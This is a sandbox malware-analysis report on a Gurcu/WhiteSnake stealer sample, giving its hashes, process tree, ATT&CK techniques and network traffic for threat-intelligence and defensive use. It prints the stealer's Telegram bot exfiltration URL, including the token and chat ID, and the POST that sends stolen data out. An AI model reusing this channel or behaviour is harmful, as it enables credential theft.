gurcu | da471727861921eeaf35b39dfcbb19a4d72a08eb7216a39c652d243f46476132

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18/01/2025, 03:31 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DotStealerBuild.exe
Size

5.6MB
MD5

d447b8a0fd9777227e0c6b69928ec62a
SHA1

97e91e2a7887f233b6a32fbd489309dc04ae2dd8
SHA256

da471727861921eeaf35b39dfcbb19a4d72a08eb7216a39c652d243f46476132
SHA512

f6eaf46b6a0f7c9c2a196bded50e9e95408057e8a17745313d5a6a0de458cd7adc965cd2617fef6ce24facb3612de9472f4e7baa44e08f62f8dafe97059678ba
SSDEEP

98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uc:adOuK6mn9NzgMoYkSIvUcwti7TQlvciE

Score

10^/10

gurcu discovery spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8195096325:AAEfdm1fuFk97K8pczpcHYgsTQqP6fYw0UE/sendDocument?chat_id=-4697256632&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	tempdatalogger.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	DotStealerBuild.exe

Executes dropped EXE 1 IoCs

pid	Process
996	tempdatalogger.exe

Loads dropped DLL 2 IoCs

pid	Process
2508	DotStealerBuild.exe
996	tempdatalogger.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
11	raw.githubusercontent.com
30	raw.githubusercontent.com
10	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
2812	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	tempdatalogger.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	tempdatalogger.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4008	timeout.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
2508	DotStealerBuild.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe
996	tempdatalogger.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2508	DotStealerBuild.exe
Token: SeDebugPrivilege	2812	tasklist.exe
Token: SeDebugPrivilege	996	tempdatalogger.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 2444	2508	DotStealerBuild.exe	95
PID 2508 wrote to memory of 2444	2508	DotStealerBuild.exe	95
PID 2444 wrote to memory of 3768	2444	cmd.exe	99
PID 2444 wrote to memory of 3768	2444	cmd.exe	99
PID 2444 wrote to memory of 2812	2444	cmd.exe	100
PID 2444 wrote to memory of 2812	2444	cmd.exe	100
PID 2444 wrote to memory of 2196	2444	cmd.exe	101
PID 2444 wrote to memory of 2196	2444	cmd.exe	101
PID 2444 wrote to memory of 4008	2444	cmd.exe	102
PID 2444 wrote to memory of 4008	2444	cmd.exe	102
PID 2444 wrote to memory of 996	2444	cmd.exe	104
PID 2444 wrote to memory of 996	2444	cmd.exe	104
PID 996 wrote to memory of 1088	996	tempdatalogger.exe	109
PID 996 wrote to memory of 1088	996	tempdatalogger.exe	109
PID 1088 wrote to memory of 2676	1088	cmd.exe	111
PID 1088 wrote to memory of 2676	1088	cmd.exe	111

C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe
"C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB46.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB46.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:3768
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 2508"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:2196
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4008
- - C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
    "C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp755A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp755A.tmp.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1088
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2676

Network

DNS

raw.githubusercontent.com

tempdatalogger.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/attatier/Cloud/main/DotInfo.txt

DotStealerBuild.exe

Remote address:

185.199.110.133:443

Request

GET /attatier/Cloud/main/DotInfo.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 7
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "9d9e20ce98fae046a1b1eafce5e4ecfdedda7154e7893b0ad6e0667696ce1144"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 774E:9C615:5D260:86D3F:678B208E
Accept-Ranges: bytes
Date: Sat, 18 Jan 2025 03:31:34 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4229-LON
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1737171095.594835,VS0,VE185
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ef0ed0e22b1ca152c99388c3417b0ffdd9bfd837
Expires: Sat, 18 Jan 2025 03:36:34 GMT
Source-Age: 0
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

7.98.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.98.22.2.in-addr.arpa

IN PTR

Response

7.98.22.2.in-addr.arpa

IN PTR

a2-22-98-7deploystaticakamaitechnologiescom
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

7.98.51.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.98.51.23.in-addr.arpa

IN PTR

Response

7.98.51.23.in-addr.arpa

IN PTR

a23-51-98-7deploystaticakamaitechnologiescom
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/attatier/Cloud/main/DotInfo.txt

tempdatalogger.exe

Remote address:

185.199.110.133:443

Request

GET /attatier/Cloud/main/DotInfo.txt HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 7
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "9d9e20ce98fae046a1b1eafce5e4ecfdedda7154e7893b0ad6e0667696ce1144"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 95AE:3D3718:22F8B7:2F7E62:678B20A8
Accept-Ranges: bytes
Date: Sat, 18 Jan 2025 03:31:57 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600094-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1737171117.404083,VS0,VE95
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 79c383bbd5aa76d6a6319e687b5e23840089b7f5
Expires: Sat, 18 Jan 2025 03:36:57 GMT
Source-Age: 0
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

google.com

tempdatalogger.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.180.14
DNS

api.telegram.org

tempdatalogger.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
DNS

ip-api.com

tempdatalogger.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

tempdatalogger.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 18 Jan 2025 03:32:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET

http://ip-api.com/json/

tempdatalogger.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 18 Jan 2025 03:32:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET

http://ip-api.com/json/

tempdatalogger.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 18 Jan 2025 03:32:19 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 57
X-Rl: 43
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
POST

https://api.telegram.org/bot8195096325:AAEfdm1fuFk97K8pczpcHYgsTQqP6fYw0UE/sendDocument?chat_id=-4697256632&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20England

tempdatalogger.exe

Remote address:

149.154.167.220:443

Request

POST /bot8195096325:AAEfdm1fuFk97K8pczpcHYgsTQqP6fYw0UE/sendDocument?chat_id=-4697256632&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20England HTTP/1.1
Content-Type: multipart/form-data; boundary="eec06d2c-c9c6-4949-a3da-bf7d937b3a9a"
Host: api.telegram.org
Content-Length: 1050325
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 18 Jan 2025 03:32:22 GMT
Content-Type: application/json
Content-Length: 664
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

209.143.182.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.143.182.52.in-addr.arpa

IN PTR

Response

185.199.110.133:443

https://raw.githubusercontent.com/attatier/Cloud/main/DotInfo.txt

tls, http

DotStealerBuild.exe

771 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/attatier/Cloud/main/DotInfo.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/attatier/Cloud/main/DotInfo.txt

tls, http

tempdatalogger.exe

771 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/attatier/Cloud/main/DotInfo.txt

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/

http

tempdatalogger.exe

549 B
1.6kB
9
4

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot8195096325:AAEfdm1fuFk97K8pczpcHYgsTQqP6fYw0UE/sendDocument?chat_id=-4697256632&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20England

tls, http

tempdatalogger.exe

1.2MB
14.1kB
930
161

HTTP Request

POST https://api.telegram.org/bot8195096325:AAEfdm1fuFk97K8pczpcHYgsTQqP6fYw0UE/sendDocument?chat_id=-4697256632&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20England

HTTP Response

200

8.8.8.8:53

raw.githubusercontent.com

dns

tempdatalogger.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.111.133

185.199.108.133

185.199.109.133
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

7.98.22.2.in-addr.arpa

dns

68 B
129 B
1
1

DNS Request

7.98.22.2.in-addr.arpa
8.8.8.8:53

133.110.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.110.199.185.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

7.98.51.23.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

7.98.51.23.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

google.com

dns

tempdatalogger.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.180.14
8.8.8.8:53

api.telegram.org

dns

tempdatalogger.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

ip-api.com

dns

tempdatalogger.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa
8.8.8.8:53

209.143.182.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

209.143.182.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp755A.tmp.bat

Filesize
149B

MD5
9b50431381f90bb6149dbb5c85095c94

SHA1
3eed9d5a930e860d2308abec184946022a258a08

SHA256
bc8d12c414c230d3c3d1e444a4a6af0bbe189ba0e810fd5aa3fd2873c5d32d4b

SHA512
a581e798ff3db6780740d71e184b98acd42f11a7c7fcbf1416a3b24833a7b09a51487ef382eea5987d5bb3d4fc14cd12be0fef6ba388083b8818256cdfc30480

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB46.tmp.bat

Filesize
278B

MD5
4c115bf7dc85a2591b9ac8c02aef70af

SHA1
1b1dec472fc2ac30b80b5839a2a26291597fdd99

SHA256
8f914eb1171dce41a7af8c12fb6173eee76495ceb58018a286282800bca910c3

SHA512
4083c9326f6790a98d54804d543115d466dc3f222d51f195d1ead54c453a7f8c03bc3e98c810a7c19eaa0e8ccfd1f068c9638a3466f83d6b1faa48026807a5a2

Download Submit
C:\Users\Admin\AppData\Roaming\AdminUserCash\CREDIT~1

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

Filesize
5.6MB

MD5
d447b8a0fd9777227e0c6b69928ec62a

SHA1
97e91e2a7887f233b6a32fbd489309dc04ae2dd8

SHA256
da471727861921eeaf35b39dfcbb19a4d72a08eb7216a39c652d243f46476132

SHA512
f6eaf46b6a0f7c9c2a196bded50e9e95408057e8a17745313d5a6a0de458cd7adc965cd2617fef6ce24facb3612de9472f4e7baa44e08f62f8dafe97059678ba

Download Submit
memory/996-27-0x000002647DFA0000-0x000002647DFDA000-memory.dmp

Filesize
232KB

Download
memory/996-25-0x0000026465340000-0x0000026465362000-memory.dmp

Filesize
136KB

Download
memory/996-54-0x000002647DF80000-0x000002647DF92000-memory.dmp

Filesize
72KB

Download
memory/996-29-0x000002647ED20000-0x000002647F04E000-memory.dmp

Filesize
3.2MB

Download
memory/996-28-0x0000026465310000-0x0000026465336000-memory.dmp

Filesize
152KB

Download
memory/996-20-0x00000264652F0000-0x000002646530E000-memory.dmp

Filesize
120KB

Download
memory/996-21-0x000002647DB80000-0x000002647DBEA000-memory.dmp

Filesize
424KB

Download
memory/996-23-0x000002647DE60000-0x000002647DF12000-memory.dmp

Filesize
712KB

Download
memory/996-24-0x000002647DF10000-0x000002647DF60000-memory.dmp

Filesize
320KB

Download
memory/2508-6-0x0000026513D30000-0x0000026513D3A000-memory.dmp

Filesize
40KB

Download
memory/2508-0-0x00007FFFFE6F3000-0x00007FFFFE6F5000-memory.dmp

Filesize
8KB

Download
memory/2508-9-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

Filesize
10.8MB

Download
memory/2508-8-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

Filesize
10.8MB

Download
memory/2508-13-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

Filesize
10.8MB

Download
memory/2508-7-0x000002652C670000-0x000002652C6E6000-memory.dmp

Filesize
472KB

Download
memory/2508-1-0x0000026511BB0000-0x0000026512148000-memory.dmp

Filesize
5.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.